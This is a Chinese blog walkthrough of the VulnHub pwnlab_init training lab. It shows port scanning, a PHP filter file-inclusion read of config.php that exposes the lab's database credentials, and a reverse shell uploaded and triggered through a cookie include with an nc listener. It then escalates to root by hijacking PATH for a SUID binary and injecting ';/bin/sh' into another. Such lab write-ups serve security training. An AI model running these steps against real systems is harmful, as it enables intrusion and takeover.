pwnlab_init靶场记录

最新推荐文章于 2024-05-01 19:38:14 发布
最新推荐文章于 2024-05-01 19:38:14 发布
阅读量325 收藏
点赞数
分类专栏: CTF 文章标签: web安全 网络安全 CTF
原文链接:https://hasaki-h2.github.io/e90a4dc2.html
版权

一、环境说明

目标:得到root权限&找到flag.txt

靶场下载地址:https://www.vulnhub.com/entry/pwnlab-init,158/

靶机IP:192.168.252.134

KaliIP:192.168.252.132

二、练习记录

扫描端口。

nmap -p 1-65535 -T4 -sT 192.168.252.134
image-20230203142330799

扫描漏洞

nikto -h http://192.168.252.134
image-20230203142528250

发现敏感文件,login.php,config.php,浏览器访问发现page=login,可能存在文件包含login.php。

image-20230203142811144

尝试包含config.php文件。

http://192.168.252.134/?page=php://filter/read=convert.base64-encode/resource=config
image-20230203143355034

获取账户密码,尝试登录MYSQL数据库,获取用户账户密码,使用kent/JWzXuBJJNy成功登录web系统,发现文件上传功能。

mysql -uroot -pH4u%QJ_H99 -h 192.168.252.134
image-20230203143556444

包含upload.php,index.php两个文件,获取源码,可以看到**$_COOKIE[‘lang’]处可以通过lang参数传值包含非.php后缀的文件**,而login.php采用白名单限制,无法直接上传php文件,需要通过文件包含进行解析执行。

image-20230203144115022

使用kali自带的php反弹shell:/usr/share/webshells/php/php-reverse-shell.php,注意修改反连IP以及端口号。

└─# locate php-rever                                                         
/usr/share/laudanum/php/php-reverse-shell.php
/usr/share/laudanum/wordpress/templates/php-reverse-shell.php
/usr/share/webshells/php/php-reverse-shell.php

监听端口后发送请求包,包含上传的webshell,获取reverse shell。

nc -lvvp 1234
curl http://192.168.252.134 -H 'cookie:lang=../upload/364be8860e8d72b4358b5e88099a935a.png'
image-20230203144919448 image-20230203145021995

获取稳定pty终端,使用登录kane账户。

python -c 'import pty;pty.spawn("/bin/bash")'
image-20230203150059622

查找具有SUID权限的文件,发现msgmike文件,查看其文件内容,发现存在cat /home/mike/msg.txt命令执行,即其权限可能为mike用户权限,如果修改cat命令,则以kane用户权限运行的msgmike文件将调用cat,并且这个cat将以mike用户权限运行,实现提权至mike用户。

find / -perm -4000 2>/dev/null

image-20230203150746440image-20230203151012240

# 修改cat
kane@pwnlab:~$ echo "/bin/bash" > cat
# 赋予执行权限
kane@pwnlab:~$ chmod +x cat
# 修改环境变量,以达到调用本地修改后的cat命令
kane@pwnlab:~$ export PATH=/home/kane
# 还原环境变量
kane@pwnlab:~$ export PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin

执行后可以看到成功切换到了mike权限用户,此时需要重新把环境变量还原。

image-20230203153227587 
# 切换到mike用户目录,发现msg2root文件
mike@pwnlab:~$ cd /home/mike/
# 查看文件发现存在echo命令执行
mike@pwnlab:/home/mike$ cat msg2root
# 通过分号拼接命令执行/bin/bash 获取root用户权限
mike@pwnlab:/home/mike$ ./msg2root
./msg2root
Message for root: test;/bin/sh
image-20230203154329636 image-20230203154406591
痴人说梦梦中人
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
__init__.pyi
08-01
pytorch __init__.pyi文件,博客配套使用,修改pytorch的bug。
pwnlab靶场通关
tpaer的博客
03-01 668
关于文件包含环境变量劫持pwnlab靶场通关
靶场测试系列(已办清单)
ElegantHedgehog的博客
09-14 233
在线靶场 https://www.owasp.org/index.php/OWASP_Vulnerable_Web_Applications_Directory_Project#tab=On-Line_apps 总清单 http://www.hackingarticles.in/capture-flag-challenges/ Hackademic: RTB1 地址 https://www.vulnhub.com/entry/hackademic-rtb1,17/ wp http://www...
PwnLab靶场&PHP伪协议&OSCP推荐&代码审计&命令劫持&命令注入
jockerboss的博客
03-19 1700
PwnLab靶场&PHP伪协议&OSCP推荐&代码审计&命令劫持&命令注入
Vulnhub靶机PWNLABINIT writeup
xingjinhao123的博客
12-04 281
Vulnhub靶机PWNLABINIT writeup 在index页面也找到了对应的源码,并且有两个文件包含漏洞 另一个是cookie包含文件,也是可以利用成功的 在login源码看到有config.php 在config.php源码当中发现了数据库的用户名密码 之前扫描端口的时候发现开发了3306,使用mysql远程连接 查看登录页面的用户名密码 使用获取的用户名密码登录,密码需要使用base64解密 登录成功,发现上传页面但不允许上传php文件 返回文
关于获取CISP-PTE一些避坑经历
01-28 1615
考场内是不允许携带外设键盘的,现场会至少有一个360安全专业人员监考.所有人电脑都会提前装一个奇安信的一个考试exe,刚开始的时候会让你连接一个WIFI,我们将会通过WIFI进行做题,做题期间你的电脑将被全程监控并且一些退出快捷键也是全部锁死(有点像勒索病毒那种界面),想要重启必须直接拔电源。中途可以上厕所,需要监考官陪同
【Vulnhub靶场】THOTH TECH: 1
DG_s1mple
03-25 3971
环境准备 下载靶机导入到vmware 靶机IP地址为:192.168.2.16 攻击机IP地址为:192.168.2.18 信息收集 使用nmap扫描一下靶机开放的端口信息 开放了ftp,ssh跟http服务 FTP 我们使用匿名访问一下ftp 有一个note.txt,我们下载看一下 亲爱的pwnlab, 我叫杰克。你的密码很弱,很容易破解,我想改密码吧。 获得一个用户名pwnlab,并且他的密码很弱 web 是一个默认页面 渗透开始 我们首先爆破一下pwnlab的密码 成功爆破,我们使用这
pwnlab_init靶机
小小猪的博客
06-09 285
pwnlab_init靶机 arp-scan -l 查询靶机ip地址 nmap -sV -Pn -A x.x.x.231 发现开放80,111,3306端口 发现登录界面 查看URL http://x.x.x.231/index.php?page=login 可能存在文件包含漏洞 此文件包含不用填写后缀名http://x.x.x.231/index.php?page=php://filter/convert.base64-encode/resource=config .
Pwnlab靶机
qq_58672257的博客
12-12 494
使用nmap函数得到pwnlab的ip为192.168.88.147。
pwnlab-init靶机渗透测试
weixin_49340699的博客
07-14 843
pwnlab-init靶机渗透测试流程 流程 首先信息收集对目标网段进行扫描 netdiscover -i etho -r 192.168.19.0/24 发现目标主机192.168.19.149 用nmap对目标主机端口扫描 nmap -sV 192.168.19.149 开了三个端口 80 111 3306 首先访问80端口 三个页面有上传,登录,和一个啥也没有的home页面上传要求先登录 从登录页面下手 打开登录页面可以看到这个url很敏感 应该是存在文件包含漏洞 先扫一下目录看看有没有发
php文件包含读源码,CTF PHP文件包含--session
weixin_30045711的博客
03-12 625
PHP文件包含 Session首先了解一下PHP文件包含漏洞----包含session利用条件:session文件路径已知,且其中内容部分可控。姿势:php的session文件的保存路径可以在phpinfo的session.save_path看到。常见的php-session存放位置:/var/lib/php/sess_PHPSESSID/var/lib/php/sess_PHPSESSID/tm...
Vulnhub靶机 PWNlab_init
菜浪马废的博客
04-15 1175
找到靶机ip 扫描到端口 发现/config.php LFI 学习链接https://blog.csdn.net/qq_29419013/article/details/81202358 解码 得到了一个数据库账号 登录进去,看见三组账号(登录时加-D,不然不能登录) kent | Sld6WHVCSkpOeQ== JWzXuBJJNy mike | U0lmZHNURW42S...
Python中的__init__作用是什么
12-17
看到Python中有个函数名比较奇特,__init__我知道加下划线的函数会自动运行,但是不知道它存在的具体意义.. Python中所有的类成员(包括数据成员)都是 公共的 ,所有的方法都是 有效的 。 只有一个例外:如果你使用的...
代码_单片机_NVIC_Init_
10-02
Usart1_Init函数用于配置串口 1,设置了通信速率等;Clock_ini函数用于对上电后 RTC的状态进行判别。并作出相应的处理;Time_Show函数用于间隔一秒通过串口显示实时时钟;RTC_IRQHandler中断服务程序,用于处理秒...
python使用 __init__初始化操作简单示例
09-18
主要介绍了python使用 __init__初始化操作,结合实例形式分析了Python面向对象程序设计中使用__init__进行初始化操作相关技巧与注意事项,需要的朋友可以参考下
php运行出现Call to undefined function curl_init()的解决方法
10-28
curl_init -- 初始化一个CURL会话,如果提示Call to undefined function curl_init那么需要如下操作即可。
网络安全思考题
weixin_62304542的博客
04-27 1084
网络安全渗透思考题
网络安全之弱口令与命令爆破(中篇)(技术进阶)
weixin_70911257的博客
04-28 801
弱口令就是容易被人们所能猜到的密码呗,例如:admin,123456,888等等简单的密码。这种针对验证码的爆破只是最简单的一种,还有其他的验证码类型,能爆破,但是有点难,等以后再出一篇看看吧,下篇的内容是token防爆破,防爆破口令绕过,word,加密的zip压缩文件,windows登录密码,mysql数据库登录密码,ssh登录密码的弱口令爆破。下个星期有空再写吧,这篇内容不全还有一个知识点没讲到(出了点问题解决了再加上来吧)。!
大模型引领未来:探索其在多个领域的深度应用与无限可能【第七章、大模型在科技、网络安全、农业等方面的应用探索】
最新发布
今晚打老虎的专栏
05-01 885
大型模型在科技、网络安全和农业领域的应用持续演进。在科技中,它们加速了天文学和科学研究的进展。在网络安全领域,大模型提高了网络威胁检测和应对的效率。而在农业中,它们帮助农民做出精准决策,优化产量和质量。这些应用展示了大模型在不同领域的广泛用途,为各行业带来新的发展机遇。
__init__和_init_
07-27
__init__和__init__是同一个概念,都是Python中的特殊方法,用于初始化一个类的实例。\[1\]在Python中,每当创建一个类的实例时,都会自动调用该类的__init__方法。__init__方法的第一个参数永远是self,表示创建的实例本身。\[3\]在__init__方法内部,可以将各种属性绑定到self,以便在创建实例时进行初始化操作。\[3\]通过在__init__方法中定义属性,可以确保每个实例都具有相同的属性,并且可以在创建实例时传入与__init__方法匹配的参数进行初始化。\[2\]__init__.py文件是一个特殊的文件,用于将一个目录作为Python包进行导入。\[1\]它可以为空文件,也可以包含一些初始化代码。__init__.py文件的存在告诉Python解释器该目录是一个包,并且可以在该包中导入其他模块。\[1\] #### 引用[.reference_title] - *1* *2* [__init__文件和__init__函数](https://blog.csdn.net/dingding_12345/article/details/70196528)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v91^control,239^v3^insert_chatgpt"}} ] [.reference_item] - *3* [Python中__init__和__init__.py的作用](https://blog.csdn.net/mch2869253130/article/details/88864962)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v91^control,239^v3^insert_chatgpt"}} ] [.reference_item] [ .reference_list ]

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值